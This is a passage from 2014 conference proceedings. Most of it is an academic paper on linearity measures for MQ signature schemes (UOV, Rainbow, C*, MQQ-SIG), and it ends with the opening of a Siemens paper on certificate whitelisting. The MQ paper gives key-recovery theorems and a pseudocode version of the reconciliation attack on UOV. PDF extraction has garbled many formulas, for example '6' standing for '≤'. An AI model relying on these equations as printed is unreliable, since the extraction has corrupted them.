t coordinates of w(i) to 0 except the i-th coordinate that we
fix to 1. Next, we pick two small constants c1 and c2 , and
form the bilinear system (8). Once the solution of this system
is known, we can recover the rest of the bases vectors, by
solving the linear system (9).
ii. The main complexity for the recovery of the key is in
solving the system (8). Thus, proof for the complexity (10) is
the same as for ii. Theorem 3. What is left, is to explain how
the constants c1 and c2 are chosen. First of all, the system
(8) consists of c1 · c2 · n equations in (n − s)c2 + (m − t)c1
variables. We choose the constants c1 and c2 such that c1 · c2 ·
n > (n − s)c2 + (m − t)c1 . Second, since the complexity is
mainly determined by the value dreg = min{(n − s)c2 , (m −
t)c1 }, these constants have to be chosen such that this value
is minimized. Note that in practice, for actual MQ schemes,
we can usually pick c1 , c2 ∈ {1, 2}.
The most important implication of the last theorem is that
when n − s or m − t is constant we have a polynomial
time algorithm for recovering a strong (s, t) separation key.
This immediately implies that for any MQ scheme with this
property we can recover in polynomial time a subspace on
which the public key is linear.
Another implication is that it provides the best strategy of
attacking an MQ scheme that possesses some strong (s, t)
separation key. Indeed, since we need to minimize dreg , we
simply look for the minimal m − t or minimal n − s s.t. there
exists a strong (s, t) separation key.
Example 4: Consider a (n, n) public key function from the
family of STS systems (cf. Example 1.iii). From Table I, for the
parameter set (r1 , . . . , rL ) we see that the scheme has a strong
(n − r1 , r1 ) separation key and also a strong (n − rL−1 , rL−1 )
separation key. For the first key, n − s = r1 is small, so we
can choose c2 = 1 and c1 such that c1 n > r1 +(n−r1 )c1 , i.e.,
we can choose c1 = 2. For the second key, n − t = n − rL−1
is small so we can choose c1 = 1 and c2 such that c2 n >
rL−1 c2 + (n − rL−1 ), i.e., we can choose c2 = 2. Note that
for small q it is perfectly fine to choose c1 = c2 = 1 in both
cases, since then at most q solutions for the strong keys will
need to be tried out.
The level of nonlinearity of a given function can be used
as sufficient condition for the nonexistence of a strong (s, t)
separation key.
Theorem
5: An (n, m) function f of linearity L(f ) 6
r
q n− 2 does not posses a strong (s, t) separation key for
s > n − r.
Proof: From the linearity given, f does not have any
component whose linear space has dimension bigger than n−r.
Thus, f is not strongly (s, t)–linear for s > n − r, and does
not have a corresponding strong (s, t) separation key.
As a direct consequence, we have the following:
Corollary 1:
1) If (F ′ , S ′ , T ′ ) is a strong (s, t) separation key for C ∗ ,
then s 6 1 and t 6 1.
2) UOV using Maiorana-McFarland bent function does not
posses a strong (s, t) separation key for any s > 0.
V.
T HE (s, t)-L INEARITY M EASURE FOR MQ SCHEMES
The size of the linear space of the components of an
(n, m) quadratic function clearly provides a measure for the
applicability of the function in MQ systems. Still, the notion
of strong (s, t)–linearity can not provide a measure for the
162
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
existence of all the linear subspaces on which the restriction
of an (n, m) function is linear.
For example, the secret map of UOV is linear on the oil
space, regardless of its nonlinearity, and even when it is of
maximum nonlinearity i.e., when it is bent. The existence of
this space enabled Kipnis and Shamir to recover it in cases
when it is large enough, as in the original Oil and Vinegar
scheme. Furthermore, the existence of such spaces improves
the attack against Rainbow, compared to an attack that only
considers linear spaces of the components.
We will show next that (s, t)–linearity provides a characterization for such subspaces, and thus, provides an improved
measure for the security of MQ schemes.
Example 5: Let P : Fnq → Fm
q be a UOV public mapping.
In Section IV, we saw that the secret map of an UOV scheme
belongs to the Maiorana-McFarland class. Thus, immediately,
from Proposition 7, we conclude that P is (m, m)–linear, i.e.,
P is linear on the oil space.
Now, similarly as in the previous section, we can define a
special type of separation key, that separates the spaces with
respect to which a function is (s, t)–linear.
Definition 8: Let
(F, S, T ), (F ′ , S ′ , T ′ )
∈
m
Fq [x1 , . . . , xn ]
× GLn (Fq ) × GLm (Fq ) and let
P = T ◦ F ◦S = T ′ ◦ F ′ ◦S ′ . We call (F ′ , S ′ , T ′ ) an
(s, t) separation key for P if P is (s, t)–linear with respect
to two spaces V and W , Dim(V ) = s, Dim(W ) = t and
S ′ = SV⊺ , T ′ = TW .
Conclusively, any public mapping that was created using
an oil and vinegar mixing has a (s, t) separation key. Table II
gives the (s, t) separation keys for some of the MQ schemes
that combine a layered structure with oil and vinegar mixing.
TABLE II. E XAMPLES OF (s, t) SEPARATION KEYS FOR SOME MQ
CRYPTOSYSTEMS
scheme
UOV
Rainbow
parameters
(s, t) separation keys
(q, v, o)
(o, o)
(q, v, o1 , o2 ) = (28 , 18, 12, 12) (12, 24), (24, 12)
MQQ-SIG (q, d, n, r) = (2, 8, 160, 80)
(8+8i, 80−8i), i ∈ {0, ..., 9}
MFE
(q k , n, m) = ((2256 )k , 12, 15)
(2k, 2k),(3k, 2k),(4k, 4k)
ℓIC
(q k , ℓ) = (2k , 3)
(2k, 2k),(k, 2k)
EnTTS
(n, m) = (32, 24)
(10, 24),(14, 14),(24, 10)
An interesting case regarding (s, t)–linearity is the C ∗
scheme for which we have the following result.
Proposition 12: Let F : Fn2 → Fn2 be the secret map of
C ∗ (cf. Example 1ii) and let gcd(ℓ, n) = d. Then, there exists
a (d, n) separation key for these parameters of C ∗ .
Proof: First, let us consider the equation Da,x (f ) = 0 for
a nonzero a. A little computation shows that it is equivalent
to
ℓ
ℓ
ax(a2 −1 + x2 −1 ) = 0,
and since we are interested in nonzero solutions we can restrict
our attention to
ℓ
ℓ
a2 −1 + x2 −1 = 0.
This equation has gcd(2ℓ − 1, 2n − 1) = 2d − 1 independent
roots (see for example [46]). Thus, there exists a space V of
dimension Dim(V ) = d s.t. Da,b (f ) = 0, for all a, b ∈ V .
This implies that Da,b (w⊺ · f ) = 0, for any w ∈ Fn2 . Further,
from Proposition 8 and Definition 8 it follows that there exists
a (d, n) separation key for the given parameters.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
Hence, the best choice for parameters of the C ∗ scheme is
when d = 1, because in this case, the dimension of the space
V is the smallest, and it is hardest to separate it. Note that
this is analogous to the case of the UOV scheme, where also
it is desirable to have smaller space V . The use of d > 1 was
exactly the property that was exploited by Dubois et al. in [25]
to break a modified version of the signature scheme SFLASH
with d > 1 before the more secure version with d = 1 was
broken due to the possibility to decompose the second order
derivative into linear functions [24]. Even then, the authors of
[25] noted that the condition d = 1 should be included in the
requirements of the scheme, a fact that was overseen by the
NESSIE consortium.
Note further that Proposition 12 implies that the dimension
of the space V is invariant under restrictions of the public
map (minus modifier). Thus, the SFLASH signature scheme
also possesses a (d, k) separation key, where k 6 n is the
number of coordinates of the public key of SFLASH, and can
equivalently be used to attack the modified version.
Similarly as for the case of strong (s, t) separation keys,
(cf. Theorem 3 and Theorem 4), we can construct a generic
algorithm that finds (s, t) separation keys. This part will be
covered in the extended version of the paper. Here we focus
our interest on a special type of separation keys, namely, (s, m)
separation keys where the space W is the entire image space
of the function. Indeed, schemes including UOV, Rainbow,
Enhanced TTS, all posses exactly such keys. We will also
show how the properties of (s, m)–linearity provide the best
strategy for attacking schemes that posses (s, m) separation
keys. Unfortunately, in this case it is more difficult to estimate
the complexity of the attacks, since the obtained equations are
of mixed nature. Therefore, we leave the complexity estimate
for future work. Still, it is notable that we again arrive to
equivalent systems of equation as in the case of good keys.
Theorem 6: Let it be known that an (s, m) separation key
exists for a given MQ public key P : Fnq → Fm
q with matrix
ei +P
e ⊺ of the coordinate functions pi .
representations Pi := P
i
i. The task of finding an (s, m) separation key (SV⊺ , TFm
) is
q
equivalent to solving the following system of equations
a(j) Pi a(k) = 0, i ∈ {1, ..., m}, j, k ∈ {1, ..., s}, j < k
e i a(k) = 0, i ∈ {1, ..., m}, k ∈ {1, ..., s},
a(k) P
(11)
in the unknown basis vectors a(j) of the space V .
ii. The key can equivalently be found by
1. First solving the system of equations
a(j) Pi a(k) = 0, i∈{1, ..., m}, j, k ∈ {1, ..., c}, j < k
e i a(k) = 0, i ∈ {1, ..., m}, k ∈ {1, ..., c},
a(k) P
(12)
in the unknown basis vectors a(k) , k ∈ {1, . . . , c} of
the space V , for an appropriately chosen integer c.
2. And then, solving the system of linear equations
a(j) Pi a(k) = 0,
(13)
i ∈ {1, ..., m}, j ∈ {1, ..., c}, k ∈ {c + 1, ..., s}, j < k
in the unknown basis vectors a(k) , k ∈ {c + 1, ..., s}
of the space V .
Proof: i. From Definition 8, P is (s, m)–linear with
respect to V, Fm
q where Dim(V ) = s. So we need to recover
only some basis {a(1) , . . . , a(s) } of V . From Definition 6
163
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
and Proposition 8, the condition for (s, t)–linearity can be
written as Da(j) ,a(k) f = 0 for all a(j) , a(k) ∈ V , i.e., as
a(j) Pi a(k) = 0. Since Da,a f = 0 for any a, we must
e i a(k) = 0. We ensure the linear
write this condition as a(k) P
independence of the unknown basis vectors {a(1) , . . . , a(s) } by
fixing the last s coordinates of a(j) to 0 except the (n−j+1)-th
coordinate that we fix to 1. The probability that we can fix the
coordinates of the basis vectors in this way is approximately
1
1 − q−1
. If the system does not yield a solution we randomize
P. In this way we form the system (11). It consists of m s+1
2
equations in s(n − s) variables.
ii. From Proposition 6, we have that if P is (s, m)–linear,
with respect to V = Span{a(1) , . . . , a(s) }, Fm
q , then it is
(s − 1, m)–linear with respect to V1 , Fm
q , where V1 ⊂ V .
Hence, there exists an array of subspaces V ⊃ V1 ⊃
· · · ⊃ Vs−1 , such that P is (s − i, m)–linear with respect to
Vi = Span{a(1) , . . . , a(s−i) }. Thus, we can first recover the
basis of some space Vs−c and then extend it to the bases of V .
That is, we first solve (12), and then we are left with the linear
system (13). What is left is how
we choose the constant c. The
equationsin (n−s)c variables.
system (12) consists of m c+1
2
> (n − s)c, in order
It is enough to choose c such that m c+1
2
to get a unique solution for the basis vectors.
Remark 1: Conditions for (s, t)–linearity have been used
in other attacks not involving good keys or system solving.
For example, the analysis of UOV in [1] uses exactly the
conditions of Proposition 8 in order to test whether a subspace
is contained in the oil space. An equivalent condition is also
used in [47] again for analysis of UOV, and the authors’
approach here is a purely heuristic one.
We conclude this part with an interesting result on the
(s, m)–linearity of a random quadratic (n, m)-function.
Proposition 13: Let f be a randomly generated (n, m)2(n−s)
function over Fq . Then, we can expect that there exist q m(s+1)
different subspaces V , such that f is (s, m)–linear with respect
to V, Fm
q .
Proof: Let the (n, m)-function f be given. Then f is
(s, m) linear with respect to some space V if and only if there
exist s linearly independent vectors a(1) , . . . , a(s) ∈ Fnq such
that V = Span{a(1) , . . . , a(s) } and f is linear on every coset
of V . Without loss of generality, we can fix s coordinates in
each of the a(k) to ensure linear independence. In this manner,
from the conditions of linearity
from Theorem 6 we obtain a
equations
in s(n − s) variables.
quadratic system of m s+1
2
We can expect that such a system, on average has around
s(n−s)
s+1
2
2(n−s)
q ( ) = q m(s+1) solutions. For simplicity, we assume that
the coordinates can be fixed in the particular manner. (In
1
general, this is possible with a probability of 1 − q−1
.) Note
that all of these solutions span different subspaces. Indeed,
(s)
(1)
(1)
(s)
suppose (a1 , . . . , a1 ) and (a2 , . . . , a2 ) are two different
(i)
(i)
(i)
solutions. Then there exists i such that a1 6= a2 . Then a2 is
(1)
(s)
not in the span of a1 , . . . , a1 because the fixed coordinates
ensure linear independence. Thus, all the solutions generate
different subspaces.
Proposition 13 implies that random quadratic (n, m) functions most probably have an (⌊ 2n−m
m+2 ⌋, m) separation key. For
the case of n = m, this means that there are no nontrivial
(s, m) separation keys, but for the case of n = 2m, we can
expect that there is a (2, m) separation key, and for n = 2m+4,
m
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
even a (3, m) separation key.
Note that Proposition 13 further implies, that for n ≈ m2 ,
a random quadratic (n, m) function is likely to have a (m, m)
separation key. This is exactly the case identified by Kipnis
et al. [1] as an insecure parameter set; see [1] for an efficient
algorithm for recovering this space.
A. On the Reconciliation Attack on UOV
Recall the shape of the internal map of UOV from Example 1i. From Proposition 7 and Proposition 6, it follows
that P is (i, m)–linear for any 1 6 i 6 m. In order to break
the scheme, it is necessary to find a vector space V , such
that P is (m, m)–linear with respect to (V, Fm
q ). We will call
any such space V an oil space. Ding et al. in [40] propose
an algorithm that sequentially performs a change of basis
that reveals gradually the space V . They call the algorithm
Reconciliation Attack on UOV. In Figure 1, we present an
equivalent version of the attack interpreted in terms of (s, t)–
linearity (cf. Algorithm 2 [40]).
Input: UOV public key P : Fnq → Fm
q .
V0 ← the zero-dimensional vector space
for k := 1 to m do
(k)
(k)
Find a(k) = (a1 , ..., av , 0, ..., 0, 1n−k+1 , 0, ..., 0) ∈
n
Fq , where 1n−k+1 denotes that the (n − k + 1)-th
coordinate is 1, by solving
a(j) Pi a(k)
e i a(k)
a(k) P
=
0, i ∈ {1, . . . , m}, j < k
=
0, i ∈ {1, . . . , m},
Construct a space Vk ⊂ Fnq with Dim(Vk ) = k, s.t.
•
Vk = Vk−1 ⊕ Span a(k) , and
•
P is (k, m)–linear with respect to (Vk , Fm
q ).
end for
Output: An oil space V = Vm of dimension m.
Figure 1. Reconciliation Attack on UOV in terms of (s, t)–linearity
It can be noticed that the Reconciliation attack is exactly
an (s, m) separation key attack, where the constant c in
Theorem 6 is chosen to be c = 1. However, we will show that
the choice of c = 1 is justified only for the (approximately)
balanced version of UOV, and not for any parameter set.
For example, consider the UOV parameter set m = 28 and
v = 56. The public key in this case has a (28, 28) separation
key. Using the reconciliation attack (equivalently if we take
c = 1 in Theorem 6) in order to find a solution for a(1)
one needs to solve a system of 28 quadratic equations in 56
variables. On average we can expect q v−m = q 28 solutions.
From the description of the reconciliation attack it seems that
any of the solutions is a “good one”, i.e., it leads eventually
to the recovery of the space V . This means that we can
simply fix v − m = 28 variables and on average get a single
solution by solving a system of 28 equations in 28 variables.
In other words, this approach seems to work equally well for
the balanced version of the scheme (when m = v) and for the
unbalanced version.
Now, consider a UOV public key P : Fnq → Fm
q . By
definition it is (m, m)–linear, and also (s, m)–linear for every
s 6 m. We can use Theorem 6 ii. to findthe (m, m) separation
> (n − m)c, i.e.,
key by choosing c such that m c+1
2
c > 2(n/m − 2). We suppose that we have fixed n − m
164
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
coordinates of the vectors a(1) , . . . , a(m) ∈ Fnq to ensure
linear independence. Suppose instead that we have chosen
c < 2(n/m − 2). Then Step 1 of Theorem 6 ii. will give on
average q 2(n−m)/m(c+1) solutions for the basis vectors, and
all the solutions span a different space of dimension c such
that P is (c, m) linear with respect to it (cf. Proposition 13).
From the choice of the basis vectors, only one of these spaces
is a subspace of the oil space V we are trying to recover.
Thus, if q 2(n−m)/m(c+1) is relatively big, it is infeasible to
find the correct subspace. If we choose a wrong space, after
several steps (depending on n, m, c), we will not be able to
find any new linearly independent vectors. The reason is that
from Proposition 13 it is expected that even in the random
case such subspaces exist, but their dimension is much smaller
than that of the actual oil space. Hence, we must choose at
least c ≈ 2(n/m − 2). For example, c = 1 is suitable only
for balanced versions where n ≈ 2m, c = 2 can be used
for n upto ≈ 3m, and for the practically used parameters of
3m < n < 4m c should be 4 or even 5.
Remark 2: In [48], Thomae analyses the efficiency of the
Reconciliation attack on UOV, and concludes that solving the
equations from the first step of the attack is quite inefficient.
He proposes instead to recover several columns from the good
key at once and introduces some optimal parameter k for the
number of columns, that corresponds to our parameter c in
Theorem 6. However, the author does not discuss why the
parameter is necessary, how to choose it, and what does it mean
with regards to different parameters of UOV. The discussion
above answers these questions.
B. Combining strong (s, t)–linearity and (s, t)–linearity
A number of existing MQ schemes combine several
paradigms in their design. For example, Rainbow [2] or EnTTS
[7] have a secret map with both layered and UOV structure.
In other words, these schemes posses both types of separation
keys. (Note that we do not talk about the trivial implication
of a (s, t) separation key when a strong (s, t) separation key
exists.) For example, Rainbow, with parameters (v, o1 , o2 ),
where n = v + o1 + o2 , m = o1 + o2 , has a (o2 , o1 + o2 )
separation key with respect to V, Fm
q , but also a strong (o2 , o1 )
separation key with respect to the same subspace V and some
W ⊂ Fm
q . We can certainly focus on only one of the keys, and
for example use either Theorem 4 or Theorem 6 to recover it.
But since they share the same V the best strategy would be to
combine the conditions for both strong linearity and linearity,
i.e., combine both theorems. A little computation shows that
in this way, we can take both c1 = c2 = 1 in Theorem 4 and
c = 1 in Theorem 6, i.e., indeed we arrive to the most efficient
case for recovery of V, W .
A similar argument applies to any MQ cryptosystem
that encompasses layered and UOV structure. Notably, the
possibility to use the aforementioned combination is exactly
why the Rainbow band separation attack is much more efficient
than the reconciliation attack.
VI.
linear transformations, (and thus, present in the public map)
and that became obvious only after the scheme was broken.
Furthermore, sometimes the constructions of the internal map
lack essential conditions as in the case of SFLASH, where
the specification was missing a condition on the gcd(ℓ, n). We
give another example concerning the MQQ-SIG scheme.
Example 6: The designers of the MQQ-SIG signature
scheme in the construction of the internal map use a special
type of quadratic (2d, d) function f = (f1 , . . . , fd ) that is
balanced when the first d arguments are fixed. They classify
such functions depending on how many of fi are linear, and
as a security measure require that all should be quadratic.
They further impose the restrictions that the rank of the
matrix of fi , i = 1, . . . , d should be high. While these
are completely reasonable requirements, they do not properly
reflect the linearity of the function, and are, thus, not at all
sufficient to avoid instances of high linearity. Instead, a better
requirement would be to impose a restriction on the rank of
any of the components v ⊺ · f , or equivalently to bound from
above the linearity L(f ).
Thus, it seems that a good practice is to include conditions
about the linearity of the used functions. A nice concise
criteria is the behaviour of the derivatives Da (f ) and Da,b (f )
of a function f (cf. Proposition 5 and 8) and the nonlinearity measure. As already mentioned, bent functions have
the highest possible nonlinearity. However, since all quadratic
bent functions over characteristic 2, are from the MaioranaMcFarland class [49], their relatively high (s, t)-linearity can
be considered as a drawback. Conclusively, other functions
that have low linearity in both senses (strong (s, t) and (s, t))
should be considered. AB functions have such properties.
Unfortunately, Gold functions (cf. C ∗ ) can not be used because
of the presence of symmetry invariants, but it seems as a good
idea to investigate other AB functions (or close to AB) for
applicability in MQ cryptosystems.
VII.
ACKNOWLEDGEMENT
The first author of the paper is partially supported by FCSE,
UKIM, R. Macedonia.
R EFERENCES
P RUDENT D ESIGN P RACTICE FOR MQ SCHEMES
In the previous sections, we saw that strong (s, t)–linearity
and (s, t)–linearity provide a reasonable measure for the
security of MQ cryptosystems. Certainly, in some schemes,
the internal structure is clear from the construction, and
such characterization may seem redundant. However, many
schemes contain a hidden structure, that is invariant under
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
C ONCLUSION
High nonlinearity of vectorial functions is nowadays widely
accepted criterion in symmetric cryptography. As it turns out,
it is also crucial for the security of MQ cryptosystems and
thus can be used as a relevant security measure in their design.
Indeed, in this paper, we provided a general framework based
on linearity measures that encompasses any attack that takes
advantage of the existence of linear spaces, and thus can be
considered as a generalization of all such attacks. That is why,
we believe that other notions from symmetric cryptography
including resiliency and differential uniformity can successfully be adapted in the MQ context, and benefit further to the
understanding of the security of MQ cryptosystems.
[1]
[2]
[3]
A. Kipnis, J. Patarin, and L. Goubin, “Unbalanced oil and vinegar
signature schemes,” in Advances in Cryptology – EUROCRYPT ’99.
Springer, 1999, pp. 206–222.
J. Ding and D. Schmidt, “Rainbow, a new multivar. polynomial signature scheme.” in ACNS, ser. LNCS, vol. 3531, 2005, pp. 164–175.
T.-T. Moh, “A public key system with signature and master key
functions,” Comm. in Algebra, vol. 27, no. 5, 1999, pp. 2207–2222.
165
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[4]
C. Wolf, A. Braeken, and B. Preneel, “On the security of stepwise
triangular systems,” Designs, Codes and Cryptography, vol. 40, no. 3,
2006, pp. 285–302.
[26]
[5]
D. Gligoroski et al., “MQQ-SIG - An Ultra-Fast and Provably CMA
Resistant Digital Signature Scheme,” in INTRUST, ser. LNCS, vol.
7222. Springer, 2011, pp. 184–203.
[27]
[6]
B.-Y. Yang, J.-M. Chen, and Y.-H. Chen, “Tts: High-speed signatures
on a low-cost smart card,” in CHES, ser. LNCS, vol. 3156. Springer,
2004, pp. 371–385.
[28]
[7]
B.-Y. Yang and J.-M. Chen, “Building secure tame-like multivariate
public-key cryptosystems: The new tts.” in ACISP ’05, ser. LNCS, vol.
3574. Springer, 2005, pp. 518–531.
[29]
[8]
H. Imai and T. Matsumoto, “Algebraic methods for constructing asymmetric cryptosystems.” in AAECC, ser. LNCS, vol. 229. Springer,
1985, pp. 108–119.
[30]
[9]
N. Courtois, L. Goubin, and J. Patarin, “Sflash, a fast asymmetric
signature scheme for low-cost smartcards - primitive specification
and supporting documentation.” [Online]. Available: www.minrank.
org/sflash-b-v2.pdf [Retrieved: September 2014].
[31]
[10]
J. Patarin, “Hidden Fields Equations (HFE) and Isomorphisms of
Polynomials (IP): two new families of asymmetric algorithms,” in
Advances in Cryptology – EUROCRYPT ’96, ser. LNCS, vol. 1070.
Springer, 1996, pp. 33–48.
[33]
[11]
O. Billet, J. Patarin, and Y. Seurin, “Analysis of intermediate field
systems,” Cryptology ePrint Archive, Report 2009/542, 2009.
[34]
[12]
C.-H. O. Chen, M.-S. Chen, J. Ding, F. Werner, and B.-Y. Yang, “Oddchar multivariate hidden field equations,” Cryptology ePrint Archive,
Report 2008/543, 2008.
[35]
[13]
J. Patarin, N. Courtois, and L. Goubin, “Quartz, 128-bit long digital
signatures.” in CT-RSA, ser. LNCS, vol. 2020. Springer, 2001, pp.
282–297.
[14]
N. Courtois and L. Goubin, “Cryptanalysis of the TTM cryptosystem,”
in Advances in Cryptology – ASIACRYPT ’00, ser. LNCS, vol. 1976.
Springer, 2000, pp. 44–57.
[15]
A. Kipnis and A. Shamir, “Cryptanalysis of the HFE Public Key Cryptosystem by Relinearization,” in Advances in Cryptology – CRYPTO
’99, ser. LNCS, vol. 1666. Springer, 1999, pp. 19–30.
[16]
E. Thomae and C. Wolf, “Cryptanalysis of Enhanced TTS, STS and
all its Variants, or: Why Cross-Terms are Important,” in Progress in
Cryptology – AFRICACRYPT ’12, ser. LNCS, vol. 7374. Springer,
2012, pp. 188–202.
[17]
L. Bettale, J.-C. Faugre, and L. Perret, “Cryptanalysis of hfe, multihfe and variants for odd and even characteristic,” Designs, Codes and
Cryptography, vol. 69, no. 1, 2013, pp. 1–52.
[32]
[36]
[37]
[38]
[39]
[40]
[41]
[18]
N. T. Courtois, “Efficient zero-knowledge authentication based on
a linear algebra problem MinRank,” in Advances in Cryptology –
ASIACRYPT ’01, ser. LNCS, vol. 2248. Springer, 2001, pp. 402–
421.
[42]
[19]
C. Wolf and B. Preneel, “Large Superfluous Keys in Multivariate
Quadratic Asymmetric Systems,” in Public Key Cryptography, ser.
LNCS, vol. 3386. Springer, 2005, pp. 275–287.
[43]
[20]
P.-A. Fouque, L. Granboulan, and J. Stern, “Differential cryptanalysis
for multivariate schemes,” in Advances in Cryptology - EUROCRYPT
’05, ser. LNCS, vol. 3494. Springer, 2005, pp. 341–353.
[21]
J. Ding, “A new variant of the Matsumoto-Imai cryptosystem through
perturbation.” in PKC, 2004, pp. 305–318.
[22]
V. Dubois, L. Granboulan, and J. Stern, “An efficient provable distinguisher for hfe,” in ICALP (2), ser. LNCS, vol. 4052. Springer, 2006,
pp. 156–167.
[23]
——, “Cryptanalysis of hfe with internal perturbation,” in Public Key
Cryptography, ser. LNCS, vol. 4450. Springer, 2007, pp. 249–265.
[24]
V. Dubois, P.-A. Fouque, A. Shamir, and J. Stern, “Practical cryptanalysis of sflash.” in Advances in Cryptology – CRYPTO ’07, ser. LNCS,
A. Menezes, Ed., vol. 4622. Springer, 2007, pp. 1–12.
[25]
V. Dubois, P.-A. Fouque, and J. Stern, “Cryptanalysis of sflash with
slightly modified parameters.” in Advances in Cryptology – EUROCRYPT ’07, ser. LNCS, M. Naor, Ed., vol. 4515. Springer, 2007, pp.
264–275.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[44]
[45]
[46]
[47]
[48]
[49]
J. Patarin, “Cryptoanalysis of the Matsumoto and Imai public key
scheme of EUROCRYPT ’88,” in Advances in Cryptology – CRYPTO
’95, 1995, pp. 248–261.
“Nessie: New european schemes for signatures, integrity, and
encryption,” 2003. [Online]. Available: https://www.cosic.esat.kuleuven.
be/nessie/ [Retrieved: September 2014].
S. Tsujii, M. Gotaishi, K. Tadaki, and R. Fujita, “Proposal of a signature
scheme based on sts trapdoor,” in Post-Quantum Cryptography, ser.
LNCS. Springer, 2010, vol. 6061, pp. 201–217.
K. Sakumoto, T. Shirai, and H. Hiwatari, “On provable security of
uov and hfe signature schemes against chosen-message attack,” in PostQuantum Cryptography, ser. LNCS, 2011, vol. 7071, pp. 68–82.
D. Smith-Tone, “On the differential security of multivariate public key
cryptosystems,” in Post-Quantum Cryptography, ser. LNCS. Springer,
2011, vol. 7071, pp. 130–142.
R. Perlner and D. Smith-Tone, “A classification of differential invariants
for multivariate post-quantum cryptosystems,” in Post-Quantum Cryptography, ser. LNCS. Springer, 2013, vol. 7932, pp. 165–173.
M. Matsui, “Linear cryptanalysis method for des cipher,” in Advances in
Cryptology - EUROCRYPT ’93, ser. LNCS, T. Helleseth, Ed. Springer
Berlin Heidelberg, 1994, vol. 765, pp. 386–397.
K. Nyberg, “On the construction of highly nonlinear permutations,” in
Advances in Cryptology – EUROCRYPT ’92, ser. LNCS, vol. 658.
Springer, 1992, pp. 92–98.
C. Boura and A. Canteaut, “A new criterion for avoiding the propagation
of linear relations through an Sbox,” in FSE 2013 - Fast Software
Encryption, ser. LNCS. Singapore: Springer, 2014.
W. Buss, G. Frandsen, and J. Shallit, “The computational complexity
of some problems of linear algebra.” J. Comput. System Sci., 1999.
C. Wolf and B. Preneel, “Equivalent Keys in Multivariate Quadratic
Public Key Systems,” Journal of Mathematical Cryptology, vol. 4, April
2011, pp. 375–415.
K. Nyberg, “Perfect nonlinear s-boxes,” in Advances in Cryptology –
EUROCRYPT ’91, ser. LNCS, D. W. Davies, Ed., vol. 547. Springer,
1991, pp. 378–386.
J. F. Dillon, “Elementary hadamard difference sets,” Ph.D. dissertation,
University of Maryland, 1974.
F. Chabaud and S. Vaudenay, “Links between differential and linear
cryptoanalysis.” in Advances in Cryptology – EUROCRYPT ’94, ser.
LNCS, vol. 950. Springer, 1994, pp. 356–365.
J. Ding, B.-Y. Yang, C.-H. O. Chen, M.-S. Chen, and C.-M. Cheng,
“New differential-algebraic attacks and reparametrization of rainbow.”
in ACNS, ser. LNCS, vol. 5037, 2008, pp. 242–257.
J. Patarin and L. Goubin, “Asymmetric cryptography with s-boxes.” in
ICICS, ser. LNCS, vol. 1334. Springer, 1997, pp. 369–380.
J. Ding, L. Hu, X. Nie, J. Li, and J. Wagner, “High order linearization
equation (hole) attack on multivariate public key cryptosystems.” in
Public Key Cryptography ’07, ser. LNCS, vol. 4450, 2007, pp. 233–
248.
J.-C. Faugère, M. S. E. Din, and P.-J. Spaenlehauer, “Gröbner bases
of bihomogeneous ideals generated by polynomials of bidegree (1, 1):
Algorithms and complexity,” J. Symb. Comput., vol. 46, no. 4, 2011,
pp. 406–437.
M. Bardet, J.-C. Faugère, and B. Salvy, “On the complexity of Gröbner
basis computation of semi-regular overdetermined algebraic equations,”
in ICPSS, 2004, pp. 71–75.
M. Bardet, J.-C. Faugère, B. Salvy, and B.-Y. Yang, “Asymptotic behaviour of the degree of regularity of semi-regular polynomial systems,”
in MEGA ’05, 2005.
R. Lidl and H. Niederreiter, Finite Fields. Cambridge UP, 1997.
A. Braeken, C. Wolf, and B. Preneel, “A study of the security of
unbalanced oil and vinegar signature schemes.” in CT-RSA, ser. LNCS,
A. Menezes, Ed., vol. 3376. Springer, 2005, pp. 29–43.
E. Thomae, “About the Security of Multivariate Quadratic Public Key
Schemes,” Ph.D. dissertation, Ruhr-University Bochum, 2013.
L. Budaghyan, C. Carlet, T. Helleseth, and A. Kholosha, “Generalized
bent functions and their relation to maiorana-mcfarland class.” in ISIT
’12. IEEE, 2012, pp. 1212–1215.
166
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Managed Certificate Whitelisting – A Basis for Internet of Things Security in
Industrial Automation Applications
Rainer Falk and Steffen Fries
Siemens AG
Corporate Technology
Munich, Germany
Email: {rainer.falk|steffen.fries}@siemens.com
Abstract—Device authentication is a basic security feature
for automation systems and for the future Internet of Things.
The design, setup and operation of a practically usable security
infrastructure for the management of required device credentials
– as cryptographic device keys and device certificates – is a
huge challenge. Also, access permissions defining authorized
communication peers have to be configured on devices.
The set-up and operation of a public key infrastructure PKI
with registration authority (RA) and certification authority (CA),
as well as the management of device permissions has shown to
be burdensome for industrial application domains.
A recent approach is based on certificate whitelisting. It is
currently standardized for field device communication within
energy automation systems by IEC 62351 in alignment with
ITU-T X.509. This new approach changes the way how digital
certificates are used and managed significantly.
After describing the new approach of managed certificate
whitelisting and giving a summary of ongoing standardization
activities, an example for the application in a real-world application domain is described. Needs for further technical work are
derived, and solution options are presented.
Keywords—Digital certificate, certificate whitelisting, credential
management, PKI, device authentication, Internet of Things.
I. I NTRODUCTION
Industrial automation systems, e. g., for energy automation,
railway automation or process automation, use open communication protocols as Ethernet, wireless local area network (WLAN) IEEE 802.11 [1], transmission control protocol
(TCP), user datagram protocol (UDP), and hypertext transfer
protocol (HTTP) [2]. The communication can be protected using standard security protocols like IEEE 802.1X/MACsec [3],
Internet key exchange (IKE) [4] with Internet protocol security
(IPsec) [5], secure shell (ssh) [6], secure sockets layer (SSL)
[7], and transport layer security (TLS) [8]. Often, asymmetric
cryptographic keys and corresponding device certificates are
used. Symmetric keys would not not scale well for the huge
number of involved devices.
In a common realization of a public key infrastructure PKI,
digital certificates are issued by a trusted certification authority
(CA). This allows to authenticate devices. Additionally, access
permissions are defined for authorized communication peers.
While this technology could be the basis for a global, uniform
secure communication, in reality, the deployment and adoption
of PKIs is often limited to HTTP server authentication. A
reason for that is the significant effort required to set-up,
maintain, and use a PKI.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The problem addressed in this paper is the practical management of device certificates for field-level automation devices.
